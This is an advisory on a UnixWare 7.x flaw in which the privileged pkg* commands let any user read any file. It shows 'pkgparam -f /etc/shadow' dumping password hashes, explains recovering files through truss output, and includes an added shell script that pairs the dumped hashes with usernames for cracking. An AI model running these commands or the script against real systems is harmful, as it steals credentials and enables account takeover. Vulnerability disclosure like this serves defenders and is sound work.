COMMAND

    pkg*

SYSTEMS AFFECTED

    UnixWare 7.x

PROBLEM

    Brock Tellier found the following.  Only UnixWare 7.1 has been tested.
    UnixWare binaries gain additional privileges in two ways: via the
    standard suid/sgid mode bits AND via /etc/security/tcb/privs.  The
    majority of the UnixWare "pkg" commands, such as pkginfo, pkgcat,
    pkgparam, etc., are vulnerable to a bug which allows any user to read
    any file on the system, as a result of the additional "dacread"
    privilege granted to them in the privs file.

    The dacread privilege allows a process to override the Discretionary
    Access Controls (DAC) for read-only operations.  Basically, a process
    with dacread is able to bypass the mode bits and ownership on a file,
    but only for reading it.  A process with dacwrite can bypass the mode
    bits to write to or execute that file.  Brock is fairly sure that the
    bugs he found in the pkg commands were introduced by their addition
    to the privs file.  As far as one can tell, there is virtually no
    reason for them to be able to read any file on the system.

    All around, this additional-privilege scheme is bad news.  Because
    the pkg* binaries are not suid/sgid (their privilege comes from the
    privs file, not from the mode bits, as the ls output below shows),
    truss(1) will happily trace them, and truss shows every byte of file
    i/o that happens between a process and the system.  Thus, if there is
    *any* way that you can make a pkg* command read from a file, even if
    the output is never printed, you can examine the truss output to
    recover the file's contents.  The worst offender of the pkg* set is
    pkgparam, which will print the contents of a file to stdout outright,
    though Brock has been able to get most of the pkg programs to read
    from /etc/shadow in one way or another and grab the contents with
    truss.

        bash-2.02$ ls -la /bin/pkgparam
        -r-xr-xr-x    1 root     sys          166784 May 21  1999 /bin/pkgparam
        bash-2.02$ /bin/pkgparam -f /etc/shadow
        Dy0l3OC7XHsj.:10925::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        *LK*:::::::
        *LK*:::::::
        *LK*:::::::
        BgusHRQZ9MH2U:10878::::::
        *LK*:::::::
        *LK*:::::::
        *LK*:::::::
        *LK*:::::::
        *LK*:::::::
        nv.Xrh2V3vArc:10882::::::
        ozT.yeRe1/dxY:10882::::::
        RinwpQfqabYbc:10928::::::
        bash-2.02$

    pkgparam drops the first (username) field of each shadow record, so
    pair each output line with the first field of the corresponding
    /etc/passwd line (this assumes both files list the accounts in the
    same order), and run your favorite cracker on the result.
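    The reconstruction step above, written out as a small shell helper.
    This is an added illustration, not part of Brock's advisory: the
    passwd and pkgparam lines it is fed in the usage at the bottom are
    constructed for the example (the hashes are the ones printed above),
    and it relies on the same-order assumption stated in the text, so it
    refuses to pair the files when their line counts differ.

```shell
#!/bin/sh
# Added example, not code from the original advisory.
# Rebuild a crackable shadow-style file from /etc/passwd usernames and the
# username-less records that "pkgparam -f /etc/shadow" prints.
# ASSUMPTION: both inputs list the accounts in the same order; the
# line-count check below catches the obvious case where they do not.

# merge_shadow PASSWD_FILE PKGPARAM_OUTPUT
# Prints "user:hash:lastchg:..." to stdout, one line per account.
# Returns 1 and prints nothing if the line counts differ, because the
# positional pairing would then be wrong.
merge_shadow() {
    passwd_file=$1
    dump_file=$2
    n1=$(wc -l < "$passwd_file")
    n2=$(wc -l < "$dump_file")
    if [ "$n1" -ne "$n2" ]; then
        echo "line count mismatch: $passwd_file has $n1 lines, $dump_file has $n2" >&2
        return 1
    fi
    # cut yields the username column; paste glues it in front of each
    # dumped record using ':' as the separator ('-' means stdin).
    cut -d: -f1 "$passwd_file" | paste -d: - "$dump_file"
}

# crackable_only FILE
# Keep only entries whose second field looks like a traditional 13-char
# crypt(3) hash, dropping "NP" (no password) and "*LK*" (locked) accounts
# so the cracker does not waste time on them.
crackable_only() {
    awk -F: 'length($2) == 13 { print }' "$1"
}

# Usage with constructed sample data (account names are invented; the hash
# strings are those shown in the pkgparam output above).
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp -d)
    printf 'root:x:0:0::/:/bin/sh\nbin:x:2:2::/bin:\nlocked:x:101:1::/home/locked:/bin/sh\nbrock:x:100:1::/home/brock:/bin/sh\n' > "$tmp/passwd"
    printf 'Dy0l3OC7XHsj.:10925::::::\nNP:6445::::::\n*LK*:::::::\nBgusHRQZ9MH2U:10878::::::\n' > "$tmp/dump"
    merge_shadow "$tmp/passwd" "$tmp/dump" > "$tmp/merged"
    crackable_only "$tmp/merged"
    rm -rf "$tmp"
fi
```

    Run it as `sh merge.sh --demo` to see the two crackable entries; in a
    real session the second input is simply the redirected output of
    `pkgparam -f /etc/shadow`.  On the defensive side, the check a
    practitioner would want first is `grep dacread
    /etc/security/tcb/privs` to see which binaries on the box have been
    handed that privilege, since the same reasoning applies to any of them
    that can be coaxed into opening an attacker-chosen path.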

SOLUTION

    Nothing yet.